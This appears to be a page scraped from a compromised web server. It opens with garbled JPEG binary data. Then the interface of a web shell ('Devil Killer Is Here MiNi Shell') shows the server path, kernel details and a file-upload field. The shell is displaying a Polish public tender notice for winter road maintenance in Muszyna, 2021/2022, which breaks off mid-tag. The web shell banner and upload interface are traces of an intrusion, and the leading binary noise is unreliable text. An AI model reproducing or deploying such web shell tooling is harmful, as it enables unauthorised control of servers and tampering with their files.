JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211013/0023144101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg na terenie Miasta i Gminy Uzdrowiskowej Muszyna w sezonie zimowym 2021/2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Gospodarki Komunalnej sp. z o.o. w Muszynie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 490510448</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piłsudskiego 128</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Muszyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-370</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">18 471-41-97</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">18 471-40-89</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ewa.dudczak@pgk-muszyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.pgk.muszyna.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg na terenie Miasta i Gminy Uzdrowiskowej Muszyna w sezonie zimowym 2021/2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-54e65349-2c02-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00231441</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00030171/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Zimowe utrzymanie dróg na terenie Miasta i Gminy Uzdrowiskowej Muszyna w sezonie zimowym 2021/2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja pomiędzy Zamawiającym a Wykonawcami, z wyjątkiem składania ofert, odbywa się za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do komunikacji wynosi 150 MB. <br/>2.	Oferty należy składać za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Szczegółowe informacje dotyczące sposobu składania ofert określone zostały w rozdziale XIV SWZ (sposób oraz termin składania ofert).<br/>3.	Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej, na adres email: ewa.dudczak@pgk.muszyna.pl <br/>4.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP. <br/>5.	We wszelkiej komunikacji związanej z niniejszym postępowaniem prowadzonej za pośrednictwem miniPortalu i ePUAP Zamawiający i wykonawcy posługują się identyfikatorem postępowania z MiniPortalu.<br/>6.	W komunikacji prowadzonej za pomocą poczty elektronicznej Zamawiający dopuszcza posługiwanie się również oznaczeniem postępowania PGK.ZP.271.8.2021.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące przetwarzania danych osobowych zostały zawarte w rozdziale XXIV SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PGK.ZP.271.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zakres usług obejmuje m.in.:<br/>1)	Kompleksowe zimowe utrzymanie dróg polegające na zapewnieniu przejezdności oraz ograniczeniu zakłóceń płynności ruchu drogowego wywołanych opadami śniegu, deszczu ze śniegiem, marznącej mżawki lub śliskością zimową jezdni, poprzez usuwanie śniegu, zapobieganie powstawaniu i likwidowanie śliskości zimowej, usunięciu śniegu. <br/>2)	Posprzątanie po zimowym utrzymaniu na drogach. <br/>3)	Szczegółowy opis przedmiotu zamówienia - warunki wykonania zostały ujęte w Specyfikacji Technicznej stanowiącej załącznik nr 1 do SWZ.<br/>4)	Wykonawca jest zobowiązany do oceny sytuacji na ulicach i odpowiedniego reagowania poprzez wysyłanie stosownych jednostek.<br/>5)	Za przejezdność ulic odpowiada Wykonawca.<br/>6)	Wykonawca zobowiązany jest ubezpieczyć wykonywane prace i najpóźniej w dniu zawarcia umowy przedłożyć Zamawiającemu uwierzytelnioną kopię polisy ubezpieczeniowej z wyszczególnieniem działalności utrzymania zimowego dróg i odpowiedzialności cywilnej wobec osób trzecich (za szkody majątkowe i osobowe), bez ograniczenia liczby zdarzeń na okres obowiązywania umowy.<br/>7)	Wymagania w zakresie łączności, które Wykonawca powinien zapewnić na dzień podpisania umowy:<br/>	całodobowa łączność z dyspozytorem przez telefon stacjonarny z faksem, plus telefon komórkowy,<br/>	łączność za pomocą tel. komórkowych; każda sprzętowa jednostka utrzymaniowa musi być wyposażona w telefon komórkowy (jeden numer na jednostkę).<br/>2.	Miejsce realizacji usługi: teren Miasta i Gminy Uzdrowiskowej Muszyna.<br/>3.	Zamawiający dopuszcza składanie ofert częściowych na poszczególne zadania:<br/>Zadanie nr	Nr drogi / nr działki	Nazwa drogi	Standardy utrzymania	Razem km<br/> <br/> <br/>1	2	3	4	5<br/>1	292937K	ul. Rolanda V	0,52<br/>	292937K	ul. Rolanda VI	0,1<br/>	292941K	ul. Rolanda – dz. nr 1218 VI	0,35<br/>	dz. nr 1213	ul. Rolanda – dz. nr 1213 VI	0,15<br/>	292941K	ul. Ogrodowa oraz drogi boczne	V	3,5<br/>	292941K	ul. Ogrodowa – dz. nr. 1198/1 VI	0,25<br/>	292941K	ul. Ogrodowa – dz. nr 3744 VI	0,4<br/>	292941K	ul. Ogrodowa – dz. nr 1180 („Malnik”)	VI	1,5<br/>	dz. nr.1166	ul. Ogrodowa VI	0,4<br/>	292941K	ul. Ogrodowa –dz. nr 1177 VI	0,65<br/>	292944K	ul. Leśna – dz. nr 3731 VI	0,12<br/>	dz. nr 3781, dz. nr 3782	ul. Leśna VI	0,95<br/>	292944K	ul. Leśna	V	1,7<br/>	292943K	ul. Podgórna	V	0,8<br/>	dz. nr 10007	ul. Kościuszki VI	0,12<br/>	dz. nr 3785	ul. Kościuszki – cmentarz	VI	0,15<br/>	dz. nr 3657/3	ul. Słoneczna VI	0,15<br/>	dz. nr 3661	ul. Słoneczna VI	0,4<br/>	dz. nr 3658	ul. Słoneczna VI	0,15<br/>	dz. nr 3652	ul. Słoneczna VI	0,2<br/>	dz. nr 3676/2	ul. Polna VI	0,45<br/>	292956K	ul. Grunwaldzka dz.nr. 1220 (obok Cmentarza)	VI	0,3<br/>	dz. nr. 3704	ul. Grunwaldzka boczna VI	0,58<br/>	dz. nr. 1219/1	ul. Grunwaldzka VI	0,4<br/>	dz. nr. 3694	ul. Grunwaldzka boczna VI	0,55<br/>	dz. nr. 3693/1	ul. Grunwaldzka boczna VI	0,13<br/>	dz. nr.3696/1	ul. Grunwaldzka VI	0,15<br/>	15,12<br/><br/>Szczegółowy opis przedmiotu zamówienia został zawarty w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. W ramach realizacji niniejszego zamówienia Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ust. 1 Pzp, w zakresie, którego<br/>Zamawiający przewiduje zwiększenie ilości dni świadczenia usługi w ilości nie większej niż<br/>50% zamówienia podstawowego dla każdego odcinka drogi objętego umową.<br/>2. Zamawiający w ramach przewidywanego prawa opcji zastrzega możliwość zwiększenia<br/>ilości zakresu usług w ramach niniejszej umowy ponad zakres podstawowy zamówienia.<br/>Zamawiający podejmie decyzję co do możliwości i woli skorzystania z zastrzeżonego<br/>prawa opcji, zgodnie z zapotrzebowaniem i posiadanymi<br/>możliwościami finansowymi. Zastrzega się, iż zakres opcjonalny zamówienia objęty<br/>prawem opcji nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego<br/>zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a przewidywany<br/>zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Realizacja<br/>(uruchomienie) prawa opcji (zakresu opcjonalnego zamówienia) nie stanowi zmiany<br/>warunków niniejszej umowy i nie wymaga zawarcia aneksu do niniejszej umowy.<br/>W przypadku skorzystania przez Zamawiającego z prawa opcji uruchomiony w tym trybie<br/>zakres opcjonalny ma być realizowany w sposób analogiczny, jak zakres podstawowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">A.	Kryteria oceny ofert i ich znaczenie<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami analogicznie dla wszystkich zadań: <br/>Nr	Nazwa kryterium	Waga<br/>1.	Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę.	60 pkt<br/>2.	Wysokości kary umownej –	jeśli Wykonawca nie prowadzi prac zgodnie z przyjętym standardem i wymogami określonymi w niniejszej umowie lub w ogóle nie rozpoczął lub zaprzestał realizacji usługi ZUD (w tym na wezwanie Zamawiającego) Zamawiający obciąży Wykonawcę karą umowną stanowiącą równowartość ……………% (zgodnie ze złożoną ofertą) jego dziennego wynagrodzenia przysługującego mu za właściwe utrzymanie drogi (której dotyczy zwłoka w realizacji usługi, niewykonanie lub nienależyte wykonanie usługi), za każdy przypadek realizacji zamówienia niezgodnie z wymogami standardu oraz niniejszej umowy, o której mowa we wzorze umowy § 14 ust 1 pkt. 1).	<br/>40 pkt<br/><br/>B.	Sposób oceny ofert w oparciu o kryteria<br/>1.	Ocenie poddane zostaną oferty nie podlegające odrzuceniu.<br/>2.	Zamawiający dokona oceny ofert w zakresie kryterium na następujących zasadach:<br/>Nr kryterium	Wzór<br/>1.<br/>Cena	Liczba punktów = (Cmin/Cof) * 60, gdzie:<br/>Cmin – najniższa cena spośród wszystkich ofert<br/>Cof – cena podana w ofercie<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/>2.<br/>Wysokość kary umownej	Sposób oceny:<br/>Punktacja za wysokość kary minimum 0,1% maksimum 0,5% będzie obliczana na podstawie wzoru:<br/>K = 100 * Kr/Kn * 0,40, gdzie:<br/>K – łączna liczba punktów otrzymanych za kryterium wysokość kary<br/>Kr – wysokość kary rozpatrywanej oferty<br/>Kn – najwyższa zaoferowana wysokość kary<br/>0,40 – waga kryterium<br/>Maksymalna liczba 40 punktów. Zostanie przyznana za udzielenie 0,5% wysokość kary umownej na wykonany przedmiot zamówienia. W przypadku zaoferowania kary umownej wyższej niż 0,5% do oceny kryterium będzie brana kara w wysokości 0,5%. Minimalna wysokość kary umownej – 0,1%. Zaoferowanie niższej wysokość kary umownej spowoduje odrzucenie oferty. <br/>3.	Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+K, gdzie:<br/>P – ostateczna liczba punktów<br/>C – liczba punktów otrzymana za kryterium cena<br/>K – liczba punktów otrzymana za kryterium wysokość kary umownej.<br/>4.	Oferta złożona przez Wykonawcę może otrzymać łącznie 100 pkt.<br/>5.	Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyska największą liczbę punktów przyznanych w ramach ustalonych kryteriów.<br/>6.	W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>7.	Zamawiający zastosuje zaokrąglenie do każdego wyniku do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokości kary umownej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zakres usług obejmuje m.in.:<br/>1)	Kompleksowe zimowe utrzymanie dróg polegające na zapewnieniu przejezdności oraz ograniczeniu zakłóceń płynności ruchu drogowego wywołanych opadami śniegu, deszczu ze śniegiem, marznącej mżawki lub śliskością zimową jezdni, poprzez usuwanie śniegu, zapobieganie powstawaniu i likwidowanie śliskości zimowej, usunięciu śniegu. <br/>2)	Posprzątanie po zimowym utrzymaniu na drogach. <br/>3)	Szczegółowy opis przedmiotu zamówienia - warunki wykonania zostały ujęte w Specyfikacji Technicznej stanowiącej załącznik nr 1 do SWZ.<br/>4)	Wykonawca jest zobowiązany do oceny sytuacji na ulicach i odpowiedniego reagowania poprzez wysyłanie stosownych jednostek.<br/>5)	Za przejezdność ulic odpowiada Wykonawca.<br/>6)	Wykonawca zobowiązany jest ubezpieczyć wykonywane prace i najpóźniej w dniu zawarcia umowy przedłożyć Zamawiającemu uwierzytelnioną kopię polisy ubezpieczeniowej z wyszczególnieniem działalności utrzymania zimowego dróg i odpowiedzialności cywilnej wobec osób trzecich (za szkody majątkowe i osobowe), bez ograniczenia liczby zdarzeń na okres obowiązywania umowy.<br/>7)	Wymagania w zakresie łączności, które Wykonawca powinien zapewnić na dzień podpisania umowy:<br/>	całodobowa łączność z dyspozytorem przez telefon stacjonarny z faksem, plus telefon komórkowy,<br/>	łączność za pomocą tel. komórkowych; każda sprzętowa jednostka utrzymaniowa musi być wyposażona w telefon komórkowy (jeden numer na jednostkę).<br/>2.	Miejsce realizacji usługi: teren Miasta i Gminy Uzdrowiskowej Muszyna.<br/>3.	Zamawiający dopuszcza składanie ofert częściowych na poszczególne zadania:<br/>Zadanie nr	Nr drogi / nr działki	Nazwa drogi	Standardy utrzymania	Razem km<br/> <br/> <br/>1	2	3	4	5<br/>2	292881K	Żegiestów – "Rusinówka"	V	0,4<br/>	292886K	Żegiestów – dz. nr 310 (k/ Kościoła wraz z parkingiem)	V	0,14<br/>	292885K	Żegiestów - droga wzdłuż torów kolejowych	VI	0,2<br/>	292882K	Żegiestów- droga w kierunku zabudowań nr 91,92, stary cmentarz	VI	0,18<br/>	292884K	Żegiestów – cmentarz	VI	0,2<br/>	292882K	Żegiestów – k/ Klubu Rolnika	VI	0,3<br/>	dz. nr. 281	Żegiestów - Oczyszczalnia	VI	0,3<br/>	292886K	Żegiestów Zdrój - Plebania VI	0,2<br/>	dz. nr. 462/5 <br/>dz. nr.459/3	Żegiestów - „Zosieńka”	VI	0,1<br/>	dz. nr.580/2	Żegiestów Zdrój – Dom Zdrojowy	VI	0,2<br/>	dz. nr 338/1	Żegiestów VI	0,14<br/>	dz. nr 351/3, dz. nr 351/4	Żegiestów VI	0,13<br/>	dz. nr 319	Żegiestów – Przekaźnik VI	0,45<br/>	dz. nr 484	Żegiestów VI	0,12<br/>	dz. nr 426/1	Żegiestów VI	0,3<br/>	dz. nr 269	Żegiestów VI	0,7<br/>	4,06<br/>Szczegółowy opis przedmiotu zamówienia został zawarty w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. W ramach realizacji niniejszego zamówienia Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ust. 1 Pzp, w zakresie, którego<br/>Zamawiający przewiduje zwiększenie ilości dni świadczenia usługi w ilości nie większej niż<br/>50% zamówienia podstawowego dla każdego odcinka drogi objętego umową.<br/>2. Zamawiający w ramach przewidywanego prawa opcji zastrzega możliwość zwiększenia<br/>ilości zakresu usług w ramach niniejszej umowy ponad zakres podstawowy zamówienia.<br/>Zamawiający podejmie decyzję co do możliwości i woli skorzystania z zastrzeżonego<br/>prawa opcji, zgodnie z zapotrzebowaniem i posiadanymi<br/>możliwościami finansowymi. Zastrzega się, iż zakres opcjonalny zamówienia objęty<br/>prawem opcji nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego<br/>zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a przewidywany<br/>zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Realizacja<br/>(uruchomienie) prawa opcji (zakresu opcjonalnego zamówienia) nie stanowi zmiany<br/>warunków niniejszej umowy i nie wymaga zawarcia aneksu do niniejszej umowy.<br/>W przypadku skorzystania przez Zamawiającego z prawa opcji uruchomiony w tym trybie<br/>zakres opcjonalny ma być realizowany w sposób analogiczny, jak zakres podstawowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span 